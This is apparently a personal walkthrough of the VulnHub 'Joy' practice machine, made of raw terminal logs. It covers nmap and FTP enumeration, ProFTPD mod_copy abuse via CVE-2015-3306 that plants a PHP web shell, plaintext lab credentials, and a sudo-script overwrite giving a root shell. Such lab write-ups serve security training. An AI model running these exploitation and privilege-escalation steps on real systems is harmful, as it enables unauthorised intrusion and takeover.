Joy

nmap

nmap -p21,22,25,80,110,139,143,445,465,587,993,995 10.0.2.54 -sC -sV 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-19 02:53 EDT
Nmap scan report for 10.0.2.54 (10.0.2.54)
Host is up (0.00035s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE STLS CAPA TOP UIDL RESP-CODES PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: have more LOGIN-REFERRALS IMAP4rev1 ID OK capabilities SASL-IR LITERAL+ STARTTLS Pre-login post-login LOGINDISABLEDA0001 listed IDLE ENABLE
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvi
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvi
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:A8:98:92 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: The,  JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_

Host script results:
|_clock-skew: mean: -2h40m03s, deviation: 4h37m06s, median: -4s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknow
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2021-04-19T14:53:47+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-19T06:53:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org
Nmap done: 1 IP address (1 host up) scanned in 42.45 seconds

Enumeration

FTP

ftp 10.0.2.54
Connected to 10.0.2.54.
220 The Good Tech Inc. FTP Server
Name (10.0.2.54:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp> cd dowload
550 dowload: No such file or directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp> cd download
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x   1 ftp      ftp          2514 Apr 19 06:57 directory
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_armadillo
-rw-rw-rw-   1 ftp      ftp            25 Jan  6  2019 project_bravado
-rw-rw-rw-   1 ftp      ftp            88 Jan  6  2019 project_desperado
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_emilio
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_flamingo
-rw-rw-rw-   1 ftp      ftp             7 Jan  6  2019 project_indigo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_komodo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_luyano
-rw-rw-rw-   1 ftp      ftp             8 Jan  6  2019 project_malindo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_okacho
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_polento
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_ronaldinho
-rw-rw-rw-   1 ftp      ftp            55 Jan  6  2019 project_sicko
-rw-rw-rw-   1 ftp      ftp            57 Jan  6  2019 project_toto
-rw-rw-rw-   1 ftp      ftp             5 Jan  6  2019 project_uno
-rw-rw-rw-   1 ftp      ftp             9 Jan  6  2019 project_vivino
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_woranto
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_yolo
-rw-rw-rw-   1 ftp      ftp           180 Jan  6  2019 project_zoo
-rwxrwxr-x   1 ftp      ftp            24 Jan  6  2019 reminder
226 Transfer complete
ftp> cd reminder
550 reminder: No such file or directory
ftp> get reminder
local: reminder remote: reminder
200 PORT command successful
150 Opening BINARY mode data connection for reminder (24 bytes)
226 Transfer complete
24 bytes received in 0.00 secs (49.3421 kB/s)
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp> 

strings reminder         
Lock down this machine!

Tried LFI but no result

 wfuzz -c -w /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt --hc 404 --hh 206 --hw 169 10.0.2.54/ossec/index.php?f==FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.0.2.54/ossec/index.php?f==FUZZ
Total requests: 9514

=====================================================================
ID           Response   Lines    Word       Chars       Payload            
=====================================================================


Total time: 0
Processed Requests: 9514
Filtered Requests: 9514
Requests/sec.: 0

GoBuster

gobuster dir -u http://10.0.2.54/ossec -w /usr/share/dirb/wordlists/big.txt -s 200,301,302 -x html,txt,php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.2.54/ossec
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
2021/04/19 03:49:44 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 274]
/.htpasswd            (Status: 403) [Size: 274]
/.htaccess.html       (Status: 403) [Size: 274]
/.htpasswd.html       (Status: 403) [Size: 274]
/.htpasswd.txt        (Status: 403) [Size: 274]
/.htaccess.txt        (Status: 403) [Size: 274]
/.htpasswd.php        (Status: 403) [Size: 274]
/.htaccess.php        (Status: 403) [Size: 274]
/LICENSE              (Status: 200) [Size: 35745]
/README               (Status: 200) [Size: 2106] 
/css                  (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/css/]
/img                  (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/img/]
/index.php            (Status: 200) [Size: 27180]                                
/js                   (Status: 301) [Size: 309] [--> http://10.0.2.54/ossec/js/] 
/lib                  (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/lib/]
/site                 (Status: 301) [Size: 311] [--> http://10.0.2.54/ossec/site/]
/tmp                  (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/tmp/] 
                                                                                  
===============================================================
2021/04/19 03:50:02 Finished
===============================================================
 smbmap -H 10.0.2.54 --depth 5
[+] Guest session       IP: 10.0.2.54:445       Name: 10.0.2.54                                         
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.5.16-Debian)

SNMP Enumeration

┌──(root💀nucleus)-[~/vulnhub/joy]
└─# strings directory      
Patrick s Directory
total 184
drwxr-xr-x 18 patrick patrick 4096 Apr 19 16:15 .
drwxr-xr-x  4 root    root    4096 Jan  6  2019 ..
-rw-r--r--  1 patrick patrick   24 Apr 19 15:40 3FJlDls4dEtazQ0xfGRlahL373aTKA79hxCzFSmBctdm8Pv0MwW1CcVtH3STkbao.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 14:45 4RgCb2HSSwvKyDS6d7Nbd8N16ZN1m76AvP3Dx8bEStOoNrf41t6RmSsYDWmIXGzz.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 15:30 aXqprGjKEDw7YhU7qmL2o5q7L1IIBO6apF6tCp1DNTD7uLYIfIht4GHWHDS3qOhD.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 14:50 b3hVEDYhrLvmVokhImQzRafdp4XFQO9C9H0LceEBKcYEAzvWHwlVHcQXyxNY4Exh.txt
-rw-------  1 patrick patrick  185 Jan 28  2019 .bash_history
-rw-r--r--  1 patrick patrick  220 Dec 23  2018 .bash_logout
-rw-r--r--  1 patrick patrick 3526 Dec 23  2018 .bashrc
drwx------  7 patrick patrick 4096 Jan 10  2019 .cache
-rw-r--r--  1 patrick patrick   24 Apr 19 15:55 cDzTVwEE7ItjX58Yrp6ciXB0yNws8TV8SatOva6Ubna4IWoxJ886fgWv99CECFxh.txt
drwx------ 10 patrick patrick 4096 Dec 26  2018 .config
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Desktop
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Documents
drwxr-xr-x  3 patrick patrick 4096 Jan  6  2019 Downloads
-rw-r--r--  1 patrick patrick    0 Apr 19 14:50 eajl17pspHujxN7BHLJfUexffGdKWpdC.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 15:15 EqOhZV9qOwKCAewEt1sNk3VeCJS3UpoJ.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 15:10 fkktiV49S47Qlzq7e4EOTjDMoh2T8ZST0mupFK9ksrsDx2G7UoyPh95VNnCFdSSj.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 14:40 fvf7EfkpUrtvLhIkDeXoqRyFJwSxvZMe.txt
drwx------  3 patrick patrick 4096 Dec 26  2018 .gnupg
-rw-r--r--  1 patrick patrick    0 Apr 19 15:05 gp1mD5FuNzfD1x0nzQqjq4xgBMvDGy5l.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 15:45 gw345J06tj91I0Yn5KvQSF6YQ5rKL42t.txt
-rwxrwxrwx  1 patrick patrick    0 Jan  9  2019 haha
-rw-r--r--  1 patrick patrick   24 Apr 19 15:20 hkuifdXx4Bi1CWSuVBMSn3jEmv9xMyzHqU97roEYlofa2cvcyzYmXJgoBpNWySTH.txt
-rw-------  1 patrick patrick 8532 Jan 28  2019 .ICEauthority
-rw-r--r--  1 patrick patrick   24 Apr 19 16:15 iEbwg74wdFTd4aBQAt0nQjZpiylcaBhOPwcVp8WU2W2o9KNmMpHZa1qoeyr84Kif.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 16:00 ix28zdyJiIueIJNTfpGTmLt7Cv718f2S.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 15:40 j7Ql0lCfFrXyN2ItNQoWOwHHYxzbXEaR.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 16:10 KP3pHMZx27IhHmTwXh61Bv1l12J3mQzG.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 15:25 KVCmIi3bNPzyziDF27vbFeHEGJTitGjW.txt
drwxr-xr-x  3 patrick patrick 4096 Dec 26  2018 .local
-rw-r--r--  1 patrick patrick   24 Apr 19 15:25 ltQgU8xJNc2sHmON7pxIUkRIQtYzFFsqjaAyFkVqyEur1HaT5hjjhErzq7sXNu4h.txt
drwx------  5 patrick patrick 4096 Dec 28  2018 .mozilla
-rw-r--r--  1 patrick patrick    0 Apr 19 15:50 mTbIkSA8KMBSQ5E8BNnpF4je9X7abosG.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 15:55 MThnzqLhRTqmfETsC2dEYNyvns0TpxGn.txt
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Music
drwxr-xr-x  2 patrick patrick 4096 Jan  8  2019 .nano
-rw-r--r--  1 patrick patrick    0 Apr 19 15:10 NHj9Q1tGF68hFCJ2d6uQDDrXTSA2ZzK2.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 15:00 NJd9OMvEboHZBMfUdbvVi1fstiW5eaRT.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 16:15 NxdDRCNOwGi0s8zoBYEsFSGjMIehbsuw.txt
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Pictures
-rw-r--r--  1 patrick patrick  675 Dec 23  2018 .profile
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Public
-rw-r--r--  1 patrick patrick    0 Apr 19 14:55 Q1aNW83ipJ3rfjfifXWDONZZMNFb9B7c.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 14:40 qdTRNfBg1Avs4grdfgH9k3ILEQuQKvfw33UgeAqJVukIDstGqtxPqGHholOEGqUh.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 14:55 Qki6kcARVQ0tMqgtetT0dqMGaMVZIPWgrNll6KF2uHdCBH8D9jjr2z0t31XtFGDw.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 16:10 RMbphjXFYRRaEctLBR7OfVu0WFJowLKfjgH4xAafOKTVvUBIzzTyTQi8JiqFQ7nf.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 15:20 Rsdu3Ak75tD6z4s3cEIlfoSAIdOVDY1c.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 15:05 rwLDEU3aoJtHEL9bmRdM15UIJo2sGMa2hnir5EKX9TLV9NuHGZBdB2kGMKmrGN2J.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 15:35 S2CIIYvoZLOgYsj9S8VFkKChW38KvzmLa4c6kdHi1zotZTeXoh9Ozcdmrpp4mseG.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 16:00 s7CrzyWgjECN4lyEB2GxsDkSJhZJ0NYHERjRfzekyVTFK5XxmUT2zEJwvDIxYOH1.txt
d---------  2 root    root    4096 Jan  9  2019 script
drwx------  2 patrick patrick 4096 Dec 26  2018 .ssh
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 Sun
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Templates
-rw-r--r--  1 patrick patrick    0 Jan  6  2019 .txt
-rw-r--r--  1 patrick patrick   24 Apr 19 15:50 TZzQM0akBNDCfyz1tk7JXSYx45P69pxaMn4jr0LjeX2ygFzqZVK7v23gJRK6rC6M.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 14:45 uw8HQthse2QdxWV9xUlUJ6g8sPaPzmqS.txt
-rw-r--r--  1 patrick patrick  407 Jan 27  2019 version_control
drwxr-xr-x  2 patrick patrick 4096 Dec 26  2018 Videos
-rw-r--r--  1 patrick patrick   24 Apr 19 16:05 VmNhOT6FwtyghSRHkDLBkR6kBIR785IXaJYoBi2ZNyjJReIc07P5JcNSS4QwgmZg.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 15:35 vmybSjbBrxlEA2Nf42dybZX5sbBKooW3.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 15:45 wk0OlzAcE7m2KIJfp2SoTLPAV1mV8PNMQJzDfERhPV5TQLXOBjyCKK0gxjZuMMrt.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 16:05 WWUWEBStcDwf5PEs4Eo7HG6zevsICKmO.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 15:15 yFg90qrnGSZtsrk3KtEaiF8BTtciD9f1kbD7twDPeZct6J7bObZWUfzZOoYrfNJl.txt
-rw-r--r--  1 patrick patrick   24 Apr 19 15:00 YwKHyGrh5a1eV4BnS9iNKvatFz1mzzjFvBap2MQerKBK12tBMSmrGFlyFoy5M7B7.txt
-rw-r--r--  1 patrick patrick    0 Apr 19 15:30 Zw2UgL4EdNERhzfXbluskOui97fKExWw.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

One thing to notice here is that we have read/write permission in /upload directory. So maybe we can use cpfr & cpto command to get the files from the patrick’s home directory to there and then find some information.

To do so connect to FTP using telnet i.e telnet IP 21 and use the following

site cpfr /path-of-file/folder-to-copy
site cpto /path-where-to-copy
$ tftp 10.0.2.54 36969
tftp> get version_control
Received 419 bytes in 0.0 seconds
tftp> quit
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.

patrick:apollo098765

Exploitation

┌──(root💀nucleus)-[~/vulnhub/joy]
└─ python exploit.py --host 10.0.2.54 --port 21 --path "/var/www/tryingharderisjoy"
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 10.0.2.54:21
[+] Target exploited, acessing shell at http://10.0.2.54/backdoor.php
[+] Running whoami: www-data
[+] Done

https://www.exploit-db.com/exploits/36803

www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls
ls
CONTRIB  README.search     img        lib                  setup.sh
LICENSE  css               index.php  ossec_conf.php       site
README   htaccess_def.txt  js         patricksecretsofjoy  tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cd patricksecretsofjoy
cd patricksecretsofjoy
bash: cd: patricksecretsofjoy: Not a directory
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?

find the creds

patrick:apollo098765 root:howtheheckdoiknowwhattherootpasswordis

┌──(root💀nucleus)-[~/vulnhub/joy]
└─# echo "/bin/bash" > test                                                      
                                                                                    
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# ftp 10.0.2.54        
Connected to 10.0.2.54.
220 The Good Tech Inc. FTP Server
Name (10.0.2.54:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Apr 19 07:57 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x   1 ftp      ftp         16421 Apr 20 07:48 directory
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_armadillo
-rw-rw-rw-   1 ftp      ftp            25 Jan  6  2019 project_bravado
-rw-rw-rw-   1 ftp      ftp            88 Jan  6  2019 project_desperado
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_emilio
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_flamingo
-rw-rw-rw-   1 ftp      ftp             7 Jan  6  2019 project_indigo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_komodo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_luyano
-rw-rw-rw-   1 ftp      ftp             8 Jan  6  2019 project_malindo
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_okacho
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_polento
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_ronaldinho
-rw-rw-rw-   1 ftp      ftp            55 Jan  6  2019 project_sicko
-rw-rw-rw-   1 ftp      ftp            57 Jan  6  2019 project_toto
-rw-rw-rw-   1 ftp      ftp             5 Jan  6  2019 project_uno
-rw-rw-rw-   1 ftp      ftp             9 Jan  6  2019 project_vivino
-rw-rw-rw-   1 ftp      ftp             0 Jan  6  2019 project_woranto
-rw-rw-rw-   1 ftp      ftp            20 Jan  6  2019 project_yolo
-rw-rw-rw-   1 ftp      ftp           180 Jan  6  2019 project_zoo
-rwxrwxr-x   1 ftp      ftp            24 Jan  6  2019 reminder
-rw-r--r--   1 ftp      ftp          3459 Apr 19 07:57 shell.php
226 Transfer complete
ftp> put test
local: test remote: test
200 PORT command successful
150 Opening BINARY mode data connection for test
226 Transfer complete
10 bytes sent in 0.00 secs (171.3268 kB/s)
ftp> exit
221 Goodbye.
                                                                                    
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# telnet 10.0.2.54    
Trying 10.0.2.54...
telnet: Unable to connect to remote host: Connection refused
                                                                                    
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# telnet 10.0.2.54 21                                                       
Trying 10.0.2.54...
Connected to 10.0.2.54.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/test
350 File or directory exists, ready for destination name
cpto /home/patrick/script/test
500 CPTO not understood
site cpto /home/patrick/script/test
250 Copy successful


Privilage Esclation

created test and using a site cpto and site cpfr copied the test file to /home/ patrick/script/test

with sudo test gave us root

patrick@JOY:/var/www/tryingharderisjoy$ sudo -l
Matching Defaults entries for patrick on JOY:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on JOY:
    (ALL) NOPASSWD: /home/patrick/script/test
patrick@JOY:/var/www/tryingharderisjoy$ sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?

../../.What permissions would you like to set the file to?
/^H^H/etc/passwd
Currently changing file permissions, please wait.
chmod: invalid mode: ‘../.././\b\b/etc/passwd’
Try 'chmod --help' for more information.
Tidying up...
7777Done!
patrick@JOY:/var/www/tryingharderisjoy$ ls -al /etc/passwd
-rwxrwxrwx 1 root root 2612 Apr 20 14:21 /etc/passwd
patrick@JOY:/var/www/tryingharderisjoy$ 

patrick@JOY:/$ sudo /home/patrick/script/test
root@JOY:/# 

lol

root@JOY:~# cat proof.txt
Never grant sudo permissions on scripts that perform system functions!